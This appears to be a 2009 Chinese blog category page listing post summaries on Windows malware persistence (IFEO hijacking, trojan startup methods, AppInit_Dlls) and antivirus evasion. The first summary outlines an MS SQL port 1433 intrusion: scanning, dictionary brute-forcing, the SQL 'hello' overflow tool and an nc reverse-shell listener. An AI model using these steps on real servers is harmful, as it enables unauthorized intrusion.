摘要:
1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 ... 阅读全文
随笔分类 - 大杂烩
映像胁持讲解
2009-11-20 17:56 by HYrz的菜园子, 232 阅读, 收藏,
摘要:
由于最近病毒都采用了IFEO映像劫持技术,导致杀软无法运行或提示无法打开文件,最近此类病毒非常流行,病毒清除操作起来相对复杂一些,所以今天特意发帖强调大家注意。关于IFEO的介绍网络上有非常多,本文借用的是剑盟skyshine的帖子内容,感谢原作者!重要的是第五步的预防方法,简单有效,可达到防患于未然,避免中毒的苦恼。 基本症状:可能有朋友遇到过这样的情况,一个正常的程序,无论把他放在哪个位置或者... 阅读全文
多种多样 关于木马病毒的六种启动方式
2009-11-20 17:34 by HYrz的菜园子, 265 阅读, 收藏,
摘要:
木马是随计算机或Windows的启动而启动并掌握一定的控制权的,其启动方式可谓多种多样,通过注册表启动、通过System.ini启动、通过某些特定程序启动等,真是防不胜防。其实只要能够遏制住不让它启动,木马就没什么用了,这里就简单说说木马的启动方式,知己知彼百战不殆嘛。一、通过"开始\程序\启动" 隐蔽性:2星 应用程度:较低 这也是一种很常见的方式,很多正常的程序都用它,大家常用的QQ就... 阅读全文
电脑病毒反抗杀毒软件的主要手段
2009-11-20 17:33 by HYrz的菜园子, 279 阅读, 收藏,
摘要:
随着电脑的普及,出现了越来越多的对抗杀毒软件以及检测工具扫描的病毒,他们会关闭甚至删除杀毒软件以及检测工具。一般用户很难判断他们藏在哪里,做了些什么。而这时杀毒软件以及安全工具确普遍无法运行。 下面主要列举说明一些常见抗杀软类病毒的需要注意的检测位置。 一:Run键值 典型病毒:AV终结者变种 目的现象:开机启动双进程坚守、关闭杀毒程序等。 检测位置: HKLM\SOFTWARE\Microsof... 阅读全文
特殊注册表键值"AppInit_Dlls"
2009-11-20 17:32 by HYrz的菜园子, 558 阅读, 收藏,
摘要:
正常情况下它的值应该是空的。 这个项目表示每当一个程序启动的时候,appinit_dlls中的dll文件就会注入到该程序里面去启动。 举个例子:如果appinit_dlls=qhbpri.dll,那么在登录windows后,系统加载了explorer.exe,那么qhbpri.dll也会出现在其中。 如果被篡改,请按以下步骤操作: 1、打开注册表: 开始——运行—... 阅读全文
程序启动方法
2009-11-11 20:03 by HYrz的菜园子, 351 阅读, 收藏,
摘要:
一、经典的启动——“启动”文件夹 单击“开始→程序”,你会发现一个“启动”菜单,这就是最经典的Windows启动位置,右击“启动”菜单选择“打开”即可将其打开,如所示,其中的程序和快捷方式都会在系统启动时自动运行。最常见的启动位置如下: 当... 阅读全文
浙公网安备 33010602011771号